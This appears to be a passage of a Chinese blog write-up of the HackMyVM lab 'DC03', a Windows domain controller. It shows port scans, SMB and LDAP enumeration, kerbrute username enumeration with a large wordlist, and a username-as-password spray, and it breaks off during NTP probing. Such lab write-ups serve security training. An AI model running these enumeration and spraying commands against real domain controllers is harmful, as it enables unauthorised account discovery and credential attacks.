{"id":865,"date":"2025-06-13T11:32:03","date_gmt":"2025-06-13T03:32:03","guid":{"rendered":"http:\/\/162.14.82.114\/?p=865"},"modified":"2025-06-13T11:32:03","modified_gmt":"2025-06-13T03:32:03","slug":"hmv-_-dc03","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/865\/06\/13\/2025\/","title":{"rendered":"hmv[-_-]DC03"},"content":{"rendered":"<h1>DC03<\/h1>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506131130459.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506131130459.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250610235718818\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506131130461.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506131130461.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250613081157301\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h2>\u4fe1\u606f\u641c\u96c6<\/h2>\n<h3>\u7aef\u53e3\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC03]\n\u2514\u2500$ rustscan -a $IP -- -sCV\n.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.\n| {}  }| { } |{ {__ {_   _}{ {__  \/  ___} \/ {} \\ |  `| |\n| .-. \\| {_} |.-._} } | |  .-._} }\\     }\/  \/\\  \\| |\\  |\n`-&#039; `-&#039;`-----&#039;`----&#039;  `-&#039;  `----&#039;  `---&#039; `-&#039;  `-&#039;`-&#039; `-&#039;\nThe Modern Day Port Scanner.\n________________________________________\n: http:\/\/discord.skerritt.blog         :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\nNmap? More like slowmap.\ud83d\udc22\n\n[~] The config file is expected to be at &quot;\/home\/kali\/.rustscan.toml&quot;\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan&#039;s speed. Use the Docker image, or up the Ulimit with &#039;--ulimit 5000&#039;. \nOpen 192.168.10.107:389\nOpen 192.168.10.107:445\nOpen 192.168.10.107:464\nOpen 192.168.10.107:53\nOpen 192.168.10.107:88\nOpen 192.168.10.107:135\nOpen 192.168.10.107:139\nOpen 192.168.10.107:593\nOpen 192.168.10.107:636\nOpen 192.168.10.107:3268\nOpen 192.168.10.107:5985\nOpen 192.168.10.107:9389\nOpen 192.168.10.107:49664\nOpen 192.168.10.107:49669\nOpen 192.168.10.107:49670\nOpen 192.168.10.107:49682\nOpen 192.168.10.107:49700\n\nPORT      STATE SERVICE       REASON          VERSION\n53\/tcp    open  domain        syn-ack ttl 128 Simple DNS Plus\n88\/tcp    open  kerberos-sec  syn-ack ttl 128 Microsoft Windows Kerberos (server time: 2025-06-13 15:15:51Z)\n135\/tcp   open  msrpc         syn-ack ttl 128 Microsoft Windows RPC\n139\/tcp   open  netbios-ssn   syn-ack ttl 128 Microsoft Windows netbios-ssn\n389\/tcp   open  ldap          syn-ack ttl 128 Microsoft Windows Active Directory LDAP (Domain: SOUPEDECODE.LOCAL0., Site: Default-First-Site-Name)\n445\/tcp   open  microsoft-ds? syn-ack ttl 128\n464\/tcp   open  kpasswd5?     syn-ack ttl 128\n593\/tcp   open  ncacn_http    syn-ack ttl 128 Microsoft Windows RPC over HTTP 1.0\n636\/tcp   open  tcpwrapped    syn-ack ttl 128\n3268\/tcp  open  ldap          syn-ack ttl 128 Microsoft Windows Active Directory LDAP (Domain: SOUPEDECODE.LOCAL0., Site: Default-First-Site-Name)\n5985\/tcp  open  http          syn-ack ttl 128 Microsoft HTTPAPI httpd 2.0 (SSDP\/UPnP)\n|_http-title: Not Found\n|_http-server-header: Microsoft-HTTPAPI\/2.0\n9389\/tcp  open  mc-nmf        syn-ack ttl 128 .NET Message Framing\n49664\/tcp open  msrpc         syn-ack ttl 128 Microsoft Windows RPC\n49669\/tcp open  msrpc         syn-ack ttl 128 Microsoft Windows RPC\n49670\/tcp open  ncacn_http    syn-ack ttl 128 Microsoft Windows RPC over HTTP 1.0\n49682\/tcp open  msrpc         syn-ack ttl 128 Microsoft Windows RPC\n49700\/tcp open  msrpc         syn-ack ttl 128 Microsoft Windows RPC\nMAC Address: 08:00:27:CB:C3:14 (PCS Systemtechnik\/Oracle VirtualBox virtual NIC)\nService Info: Host: DC01; OS: Windows; CPE: cpe:\/o:microsoft:windows\n\nHost script results:\n|_clock-skew: 14h59m58s\n| smb2-security-mode: \n|   3:1:1: \n|_    Message signing enabled and required\n| nbstat: NetBIOS name: DC01, NetBIOS user: &lt;unknown&gt;, NetBIOS MAC: 08:00:27:cb:c3:14 (PCS Systemtechnik\/Oracle VirtualBox virtual NIC)\n| Names:\n|   SOUPEDECODE&lt;1c&gt;      Flags: &lt;group&gt;&lt;active&gt;\n|   DC01&lt;00&gt;             Flags: &lt;unique&gt;&lt;active&gt;\n|   SOUPEDECODE&lt;00&gt;      Flags: &lt;group&gt;&lt;active&gt;\n|   DC01&lt;20&gt;             Flags: &lt;unique&gt;&lt;active&gt;\n|   SOUPEDECODE&lt;1b&gt;      Flags: &lt;unique&gt;&lt;active&gt;\n| Statistics:\n|   08:00:27:cb:c3:14:00:00:00:00:00:00:00:00:00:00:00\n|   00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00\n|_  00:00:00:00:00:00:00:00:00:00:00:00:00:00\n| p2p-conficker: \n|   Checking for Conficker.C or higher...\n|   Check 1 (port 12318\/tcp): CLEAN (Timeout)\n|   Check 2 (port 62243\/tcp): CLEAN (Timeout)\n|   Check 3 (port 58595\/udp): CLEAN (Timeout)\n|   Check 4 (port 60390\/udp): CLEAN (Timeout)\n|_  0\/4 checks are positive: Host is CLEAN or ports are blocked\n| smb2-time: \n|   date: 2025-06-13T15:16:39\n|_  start_date: N\/A<\/code><\/pre>\n<h2>\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n<h3>\u654f\u611f\u7aef\u53e3\u4fe1\u606f\u641c\u96c6<\/h3>\n<h4>smb\u670d\u52a1<\/h4>\n<p>\u53d1\u73b0\u5f00\u542f\u4e86<code>smb<\/code>\u670d\u52a1\uff0c445 \u7aef\u53e3\uff0c\u5c1d\u8bd5\u641c\u96c6\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC03]\n\u2514\u2500$ enum4linux -a $IP\nStarting enum4linux v0.9.1 ( http:\/\/labs.portcullis.co.uk\/application\/enum4linux\/ ) on Thu Jun 12 20:18:54 2025\n\n =========================================( Target Information )=========================================\n\nTarget ........... 192.168.10.107\nRID Range ........ 500-550,1000-1050\nUsername ......... &#039;&#039;\nPassword ......... &#039;&#039;\nKnown Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none\n\n ===========================( Enumerating Workgroup\/Domain on 192.168.10.107 )===========================\n\n[+] Got domain\/workgroup name: SOUPEDECODE\n\n ===============================( Nbtstat Information for 192.168.10.107 )===============================\n\nLooking up status of 192.168.10.107\n        SOUPEDECODE     &lt;1c&gt; - &lt;GROUP&gt; B &lt;ACTIVE&gt;  Domain Controllers\n        DC01            &lt;00&gt; -         B &lt;ACTIVE&gt;  Workstation Service\n        SOUPEDECODE     &lt;00&gt; - &lt;GROUP&gt; B &lt;ACTIVE&gt;  Domain\/Workgroup Name\n        DC01            &lt;20&gt; -         B &lt;ACTIVE&gt;  File Server Service\n        SOUPEDECODE     &lt;1b&gt; -         B &lt;ACTIVE&gt;  Domain Master Browser\n\n        MAC Address = 08-00-27-CB-C3-14\n\n ==================================( Session Check on 192.168.10.107 )==================================\n\n[E] Server doesn&#039;t allow session using username &#039;&#039;, password &#039;&#039;.  Aborting remainder of tests.<\/code><\/pre>\n<p>\u5c1d\u8bd5\u8bbf\u95ee\u4e00\u4e0b\u5171\u4eab\u76ee\u5f55\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC03]\n\u2514\u2500$ netexec smb $IP -u &quot;&quot; -p &quot;&quot; --shares\nSMB         192.168.10.107  445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False) \nSMB         192.168.10.107  445    DC01             [-] SOUPEDECODE.LOCAL\\: STATUS_ACCESS_DENIED \nSMB         192.168.10.107  445    DC01             [-] Error enumerating shares: Error occurs while reading from remote(104)<\/code><\/pre>\n<h4>LDAP\u670d\u52a1<\/h4>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC03]\n\u2514\u2500$ nmap -n -sV --script &quot;ldap* and not brute&quot; $IP\nStarting Nmap 7.95 ( https:\/\/nmap.org ) at 2025-06-12 20:25 EDT\nNmap scan report for 192.168.10.107\nHost is up (0.00068s latency).\nNot shown: 988 filtered tcp ports (no-response)\nPORT     STATE SERVICE       VERSION\n53\/tcp   open  domain        Simple DNS Plus\n88\/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-06-13 15:25:33Z)\n135\/tcp  open  msrpc         Microsoft Windows RPC\n139\/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn\n389\/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: SOUPEDECODE.LOCAL, Site: Default-First-Site-Name)\n| ldap-rootdse: \n| LDAP Results\n|   &lt;ROOT&gt;\n|       domainFunctionality: 7\n|       forestFunctionality: 7\n|       domainControllerFunctionality: 7\n|       rootDomainNamingContext: DC=SOUPEDECODE,DC=LOCAL\n|       ldapServiceName: SOUPEDECODE.LOCAL:dc01$@SOUPEDECODE.LOCAL\n|       isGlobalCatalogReady: TRUE\n|       supportedSASLMechanisms: GSSAPI\n|       supportedSASLMechanisms: GSS-SPNEGO\n|       supportedSASLMechanisms: EXTERNAL\n|       supportedSASLMechanisms: DIGEST-MD5\n|       supportedLDAPVersion: 3\n|       supportedLDAPVersion: 2\n|       supportedLDAPPolicies: MaxPoolThreads\n|       supportedLDAPPolicies: MaxPercentDirSyncRequests\n|       supportedLDAPPolicies: MaxDatagramRecv\n|       supportedLDAPPolicies: MaxReceiveBuffer\n|       supportedLDAPPolicies: InitRecvTimeout\n|       supportedLDAPPolicies: MaxConnections\n|       supportedLDAPPolicies: MaxConnIdleTime\n|       supportedLDAPPolicies: MaxPageSize\n|       supportedLDAPPolicies: MaxBatchReturnMessages\n|       supportedLDAPPolicies: MaxQueryDuration\n|       supportedLDAPPolicies: MaxDirSyncDuration\n|       supportedLDAPPolicies: MaxTempTableSize\n|       supportedLDAPPolicies: MaxResultSetSize\n|       supportedLDAPPolicies: MinResultSets\n|       supportedLDAPPolicies: MaxResultSetsPerConn\n|       supportedLDAPPolicies: MaxNotificationPerConn\n|       supportedLDAPPolicies: MaxValRange\n|       supportedLDAPPolicies: MaxValRangeTransitive\n|       supportedLDAPPolicies: ThreadMemoryLimit\n|       supportedLDAPPolicies: SystemMemoryLimitPercent\n|       supportedControl: 1.2.840.113556.1.4.319\n|       supportedControl: 1.2.840.113556.1.4.801\n|       supportedControl: 1.2.840.113556.1.4.473\n|       supportedControl: 1.2.840.113556.1.4.528\n|       supportedControl: 1.2.840.113556.1.4.417\n|       supportedControl: 1.2.840.113556.1.4.619\n|       supportedControl: 1.2.840.113556.1.4.841\n|       supportedControl: 1.2.840.113556.1.4.529\n|       supportedControl: 1.2.840.113556.1.4.805\n|       supportedControl: 1.2.840.113556.1.4.521\n|       supportedControl: 1.2.840.113556.1.4.970\n|       supportedControl: 1.2.840.113556.1.4.1338\n|       supportedControl: 1.2.840.113556.1.4.474\n|       supportedControl: 1.2.840.113556.1.4.1339\n|       supportedControl: 1.2.840.113556.1.4.1340\n|       supportedControl: 1.2.840.113556.1.4.1413\n|       supportedControl: 2.16.840.1.113730.3.4.9\n|       supportedControl: 2.16.840.1.113730.3.4.10\n|       supportedControl: 1.2.840.113556.1.4.1504\n|       supportedControl: 1.2.840.113556.1.4.1852\n|       supportedControl: 1.2.840.113556.1.4.802\n|       supportedControl: 1.2.840.113556.1.4.1907\n|       supportedControl: 1.2.840.113556.1.4.1948\n|       supportedControl: 1.2.840.113556.1.4.1974\n|       supportedControl: 1.2.840.113556.1.4.1341\n|       supportedControl: 1.2.840.113556.1.4.2026\n|       supportedControl: 1.2.840.113556.1.4.2064\n|       supportedControl: 1.2.840.113556.1.4.2065\n|       supportedControl: 1.2.840.113556.1.4.2066\n|       supportedControl: 1.2.840.113556.1.4.2090\n|       supportedControl: 1.2.840.113556.1.4.2205\n|       supportedControl: 1.2.840.113556.1.4.2204\n|       supportedControl: 1.2.840.113556.1.4.2206\n|       supportedControl: 1.2.840.113556.1.4.2211\n|       supportedControl: 1.2.840.113556.1.4.2239\n|       supportedControl: 1.2.840.113556.1.4.2255\n|       supportedControl: 1.2.840.113556.1.4.2256\n|       supportedControl: 1.2.840.113556.1.4.2309\n|       supportedControl: 1.2.840.113556.1.4.2330\n|       supportedControl: 1.2.840.113556.1.4.2354\n|       supportedCapabilities: 1.2.840.113556.1.4.800\n|       supportedCapabilities: 1.2.840.113556.1.4.1670\n|       supportedCapabilities: 1.2.840.113556.1.4.1791\n|       supportedCapabilities: 1.2.840.113556.1.4.1935\n|       supportedCapabilities: 1.2.840.113556.1.4.2080\n|       supportedCapabilities: 1.2.840.113556.1.4.2237\n|       subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=SOUPEDECODE,DC=LOCAL\n|       serverName: CN=DC01,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=SOUPEDECODE,DC=LOCAL\n|       schemaNamingContext: CN=Schema,CN=Configuration,DC=SOUPEDECODE,DC=LOCAL\n|       namingContexts: DC=SOUPEDECODE,DC=LOCAL\n|       namingContexts: CN=Configuration,DC=SOUPEDECODE,DC=LOCAL\n|       namingContexts: CN=Schema,CN=Configuration,DC=SOUPEDECODE,DC=LOCAL\n|       namingContexts: DC=DomainDnsZones,DC=SOUPEDECODE,DC=LOCAL\n|       namingContexts: DC=ForestDnsZones,DC=SOUPEDECODE,DC=LOCAL\n|       isSynchronized: TRUE\n|       highestCommittedUSN: 45077\n|       dsServiceName: CN=NTDS Settings,CN=DC01,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=SOUPEDECODE,DC=LOCAL\n|       dnsHostName: DC01.SOUPEDECODE.LOCAL\n|       defaultNamingContext: DC=SOUPEDECODE,DC=LOCAL\n|       currentTime: 20250613152533.0Z\n|_      configurationNamingContext: CN=Configuration,DC=SOUPEDECODE,DC=LOCAL\n445\/tcp  open  microsoft-ds?\n464\/tcp  open  kpasswd5?\n593\/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0\n636\/tcp  open  tcpwrapped\n3268\/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: SOUPEDECODE.LOCAL, Site: Default-First-Site-Name)\n| ldap-rootdse: \n| LDAP Results\n|   &lt;ROOT&gt;\n|       domainFunctionality: 7\n|       forestFunctionality: 7\n|       domainControllerFunctionality: 7\n|       rootDomainNamingContext: DC=SOUPEDECODE,DC=LOCAL\n|       ldapServiceName: SOUPEDECODE.LOCAL:dc01$@SOUPEDECODE.LOCAL\n|       isGlobalCatalogReady: TRUE\n|       supportedSASLMechanisms: GSSAPI\n|       supportedSASLMechanisms: GSS-SPNEGO\n|       supportedSASLMechanisms: EXTERNAL\n|       supportedSASLMechanisms: DIGEST-MD5\n|       supportedLDAPVersion: 3\n|       supportedLDAPVersion: 2\n|       supportedLDAPPolicies: MaxPoolThreads\n|       supportedLDAPPolicies: MaxPercentDirSyncRequests\n|       supportedLDAPPolicies: MaxDatagramRecv\n|       supportedLDAPPolicies: MaxReceiveBuffer\n|       supportedLDAPPolicies: InitRecvTimeout\n|       supportedLDAPPolicies: MaxConnections\n|       supportedLDAPPolicies: MaxConnIdleTime\n|       supportedLDAPPolicies: MaxPageSize\n|       supportedLDAPPolicies: MaxBatchReturnMessages\n|       supportedLDAPPolicies: MaxQueryDuration\n|       supportedLDAPPolicies: MaxDirSyncDuration\n|       supportedLDAPPolicies: MaxTempTableSize\n|       supportedLDAPPolicies: MaxResultSetSize\n|       supportedLDAPPolicies: MinResultSets\n|       supportedLDAPPolicies: MaxResultSetsPerConn\n|       supportedLDAPPolicies: MaxNotificationPerConn\n|       supportedLDAPPolicies: MaxValRange\n|       supportedLDAPPolicies: MaxValRangeTransitive\n|       supportedLDAPPolicies: ThreadMemoryLimit\n|       supportedLDAPPolicies: SystemMemoryLimitPercent\n|       supportedControl: 1.2.840.113556.1.4.319\n|       supportedControl: 1.2.840.113556.1.4.801\n|       supportedControl: 1.2.840.113556.1.4.473\n|       supportedControl: 1.2.840.113556.1.4.528\n|       supportedControl: 1.2.840.113556.1.4.417\n|       supportedControl: 1.2.840.113556.1.4.619\n|       supportedControl: 1.2.840.113556.1.4.841\n|       supportedControl: 1.2.840.113556.1.4.529\n|       supportedControl: 1.2.840.113556.1.4.805\n|       supportedControl: 1.2.840.113556.1.4.521\n|       supportedControl: 1.2.840.113556.1.4.970\n|       supportedControl: 1.2.840.113556.1.4.1338\n|       supportedControl: 1.2.840.113556.1.4.474\n|       supportedControl: 1.2.840.113556.1.4.1339\n|       supportedControl: 1.2.840.113556.1.4.1340\n|       supportedControl: 1.2.840.113556.1.4.1413\n|       supportedControl: 2.16.840.1.113730.3.4.9\n|       supportedControl: 2.16.840.1.113730.3.4.10\n|       supportedControl: 1.2.840.113556.1.4.1504\n|       supportedControl: 1.2.840.113556.1.4.1852\n|       supportedControl: 1.2.840.113556.1.4.802\n|       supportedControl: 1.2.840.113556.1.4.1907\n|       supportedControl: 1.2.840.113556.1.4.1948\n|       supportedControl: 1.2.840.113556.1.4.1974\n|       supportedControl: 1.2.840.113556.1.4.1341\n|       supportedControl: 1.2.840.113556.1.4.2026\n|       supportedControl: 1.2.840.113556.1.4.2064\n|       supportedControl: 1.2.840.113556.1.4.2065\n|       supportedControl: 1.2.840.113556.1.4.2066\n|       supportedControl: 1.2.840.113556.1.4.2090\n|       supportedControl: 1.2.840.113556.1.4.2205\n|       supportedControl: 1.2.840.113556.1.4.2204\n|       supportedControl: 1.2.840.113556.1.4.2206\n|       supportedControl: 1.2.840.113556.1.4.2211\n|       supportedControl: 1.2.840.113556.1.4.2239\n|       supportedControl: 1.2.840.113556.1.4.2255\n|       supportedControl: 1.2.840.113556.1.4.2256\n|       supportedControl: 1.2.840.113556.1.4.2309\n|       supportedControl: 1.2.840.113556.1.4.2330\n|       supportedControl: 1.2.840.113556.1.4.2354\n|       supportedCapabilities: 1.2.840.113556.1.4.800\n|       supportedCapabilities: 1.2.840.113556.1.4.1670\n|       supportedCapabilities: 1.2.840.113556.1.4.1791\n|       supportedCapabilities: 1.2.840.113556.1.4.1935\n|       supportedCapabilities: 1.2.840.113556.1.4.2080\n|       supportedCapabilities: 1.2.840.113556.1.4.2237\n|       subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=SOUPEDECODE,DC=LOCAL\n|       serverName: CN=DC01,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=SOUPEDECODE,DC=LOCAL\n|       schemaNamingContext: CN=Schema,CN=Configuration,DC=SOUPEDECODE,DC=LOCAL\n|       namingContexts: DC=SOUPEDECODE,DC=LOCAL\n|       namingContexts: CN=Configuration,DC=SOUPEDECODE,DC=LOCAL\n|       namingContexts: CN=Schema,CN=Configuration,DC=SOUPEDECODE,DC=LOCAL\n|       namingContexts: DC=DomainDnsZones,DC=SOUPEDECODE,DC=LOCAL\n|       namingContexts: DC=ForestDnsZones,DC=SOUPEDECODE,DC=LOCAL\n|       isSynchronized: TRUE\n|       highestCommittedUSN: 45077\n|       dsServiceName: CN=NTDS Settings,CN=DC01,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=SOUPEDECODE,DC=LOCAL\n|       dnsHostName: DC01.SOUPEDECODE.LOCAL\n|       defaultNamingContext: DC=SOUPEDECODE,DC=LOCAL\n|       currentTime: 20250613152533.0Z\n|_      configurationNamingContext: CN=Configuration,DC=SOUPEDECODE,DC=LOCAL\n3269\/tcp open  tcpwrapped\n5985\/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP\/UPnP)\n|_http-server-header: Microsoft-HTTPAPI\/2.0\nMAC Address: 08:00:27:CB:C3:14 (PCS Systemtechnik\/Oracle VirtualBox virtual NIC)\nService Info: Host: DC01; OS: Windows; CPE: cpe:\/o:microsoft:windows\n\nService detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 11.11 seconds<\/code><\/pre>\n<p>\u6dfb\u52a0dns\u89e3\u6790\uff1a<\/p>\n<pre><code class=\"language-bash\">192.168.10.107   SOUPEDECODE.LOCAL<\/code><\/pre>\n<h4>\u7206\u7834kerberos\u670d\u52a1<\/h4>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC03]\n\u2514\u2500$  ..\/DC02\/kerbrute_linux_amd64 userenum -d SOUPEDECODE.LOCAL --dc 192.168.10.107 \/usr\/share\/wordlists\/seclists\/Usernames\/xato-net-10-million-usernames.txt \n\n    __             __               __     \n   \/ \/_____  _____\/ \/_  _______  __\/ \/____ \n  \/ \/\/_\/ _ \\\/ ___\/ __ \\\/ ___\/ \/ \/ \/ __\/ _ \\\n \/ ,&lt; \/  __\/ \/  \/ \/_\/ \/ \/  \/ \/_\/ \/ \/_\/  __\/\n\/_\/|_|\\___\/_\/  \/_.___\/_\/   \\__,_\/\\__\/\\___\/                                        \n\nVersion: v1.0.3 (9dad6e1) - 06\/12\/25 - Ronnie Flathers @ropnop\n\n2025\/06\/12 20:30:08 &gt;  Using KDC(s):\n2025\/06\/12 20:30:08 &gt;   192.168.10.107:88\n\n2025\/06\/12 20:30:08 &gt;  [+] VALID USERNAME:       charlie@SOUPEDECODE.LOCAL\n2025\/06\/12 20:30:08 &gt;  [+] VALID USERNAME:       Charlie@SOUPEDECODE.LOCAL\n2025\/06\/12 20:30:08 &gt;  [+] VALID USERNAME:       administrator@SOUPEDECODE.LOCAL\n2025\/06\/12 20:30:13 &gt;  [+] VALID USERNAME:       Administrator@SOUPEDECODE.LOCAL\n2025\/06\/12 20:30:13 &gt;  [+] VALID USERNAME:       CHARLIE@SOUPEDECODE.LOCAL\n2025\/06\/12 20:35:35 &gt;  [+] VALID USERNAME:       wreed11@SOUPEDECODE.LOCAL\n2025\/06\/12 20:49:33 &gt;  [+] VALID USERNAME:       printserver@SOUPEDECODE.LOCAL\n2025\/06\/12 21:01:56 &gt;  [+] VALID USERNAME:       kleo2@SOUPEDECODE.LOCAL\n2025\/06\/12 21:22:45 &gt;  [+] VALID USERNAME:       dc01@SOUPEDECODE.LOCAL\n2025\/06\/12 21:37:29 &gt;  [+] VALID USERNAME:       ChArLiE@SOUPEDECODE.LOCAL\n2025\/06\/12 21:37:34 &gt;  [+] VALID USERNAME:       CHarlie@SOUPEDECODE.LOCAL\n2025\/06\/12 21:39:37 &gt;  Done! Tested 8295455 usernames (11 valid) in 4169.688 seconds<\/code><\/pre>\n<pre><code class=\"language-bash\">charlie\nadministrtor\nwreed11\nkleo2<\/code><\/pre>\n<p>\u4f46\u662f\u53d1\u73b0\u6ca1\u6709\u53ef\u4ee5\u7528\u7684\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC03]\n\u2514\u2500$ netexec smb $IP -u user -p user   \nSMB         192.168.10.107  445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False) \nSMB         192.168.10.107  445    DC01             [-] SOUPEDECODE.LOCAL\\charlie:charlie STATUS_LOGON_FAILURE \nSMB         192.168.10.107  445    DC01             [-] SOUPEDECODE.LOCAL\\administrtor:charlie STATUS_LOGON_FAILURE \nSMB         192.168.10.107  445    DC01             [-] SOUPEDECODE.LOCAL\\wreed11:charlie STATUS_LOGON_FAILURE \nSMB         192.168.10.107  445    DC01             [-] SOUPEDECODE.LOCAL\\kleo2:charlie STATUS_LOGON_FAILURE \nSMB         192.168.10.107  445    DC01             [-] SOUPEDECODE.LOCAL\\charlie:administrtor STATUS_LOGON_FAILURE \nSMB         192.168.10.107  445    DC01             [-] SOUPEDECODE.LOCAL\\administrtor:administrtor STATUS_LOGON_FAILURE \nSMB         192.168.10.107  445    DC01             [-] SOUPEDECODE.LOCAL\\wreed11:administrtor STATUS_LOGON_FAILURE \nSMB         192.168.10.107  445    DC01             [-] SOUPEDECODE.LOCAL\\kleo2:administrtor STATUS_LOGON_FAILURE \nSMB         192.168.10.107  445    DC01             [-] SOUPEDECODE.LOCAL\\charlie:wreed11 STATUS_LOGON_FAILURE \nSMB         192.168.10.107  445    DC01             [-] SOUPEDECODE.LOCAL\\administrtor:wreed11 STATUS_LOGON_FAILURE \nSMB         192.168.10.107  445    DC01             [-] SOUPEDECODE.LOCAL\\wreed11:wreed11 STATUS_LOGON_FAILURE \nSMB         192.168.10.107  445    DC01             [-] SOUPEDECODE.LOCAL\\kleo2:wreed11 STATUS_LOGON_FAILURE \nSMB         192.168.10.107  445    DC01             [-] SOUPEDECODE.LOCAL\\charlie:kleo2 STATUS_LOGON_FAILURE \nSMB         192.168.10.107  445    DC01             [-] SOUPEDECODE.LOCAL\\administrtor:kleo2 STATUS_LOGON_FAILURE \nSMB         192.168.10.107  445    DC01             [-] SOUPEDECODE.LOCAL\\wreed11:kleo2 STATUS_LOGON_FAILURE \nSMB         192.168.10.107  445    DC01             [-] SOUPEDECODE.LOCAL\\kleo2:kleo2 STATUS_LOGON_FAILURE<\/code><\/pre>\n<h3>UDP\u7aef\u53e3\u4fe1\u606f\u641c\u96c6<\/h3>\n<p>\u7531\u4e8e\u672a\u53d1\u73b0\u53ef\u5229\u7528\u7684\u70b9\uff0c\u5c1d\u8bd5\u4e00\u4e0b<code>udp<\/code>\u4fe1\u606f\u641c\u96c6\uff08\u8fd9\u4e2a\u51fa\u9898\u4eba\u7684\u9898\u76ee\u5f88\u5c11\u6709\u7206\u7834\u7c7b\u7684\uff09<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC03]\n\u2514\u2500$ sudo nmap -Pn -sU -F $IP --max-rate 50 --min-rate 15\nStarting Nmap 7.95 ( https:\/\/nmap.org ) at 2025-06-12 20:49 EDT\nNmap scan report for 192.168.10.107\nHost is up (0.0035s latency).\nNot shown: 96 open|filtered udp ports (no-response)\nPORT    STATE SERVICE\n53\/udp  open  domain\n88\/udp  open  kerberos-sec\n123\/udp open  ntp\n137\/udp open  netbios-ns\nMAC Address: 08:00:27:CB:C3:14 (PCS Systemtechnik\/Oracle VirtualBox virtual NIC)\n\nNmap done: 1 IP address (1 host up) scanned in 5.41 seconds<\/code><\/pre>\n<h4>ntp \u670d\u52a1<\/h4>\n<p>\u5f00\u542f\u7684<code>123<\/code>\u7aef\u53e3\u5c31\u662f\u8fd0\u884c\u8fd9\u4e2a\u670d\u52a1\u7684\uff0c\u5c1d\u8bd5\u8fdb\u884c\u4fe1\u606f\u641c\u96c6\uff1a<a href=\"https:\/\/book.hacktricks.wiki\/en\/network-services-pentesting\/pentesting-ntp.html?highlight=123#hacktricks-automatic-commands\">https:\/\/book.hacktricks.wiki\/en\/network-services-pentesting\/pentesting-ntp.html?highlight=123#hacktricks-automatic-commands<\/a><\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC03]\n\u2514\u2500$ ntpq -c readlist $IP                                                                  \n***Request timed out\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC03]\n\u2514\u2500$ nmap -sU -sV --script &quot;ntp* and (discovery or vuln) and not (dos or brute)&quot; -p 123 $IP \nStarting Nmap 7.95 ( 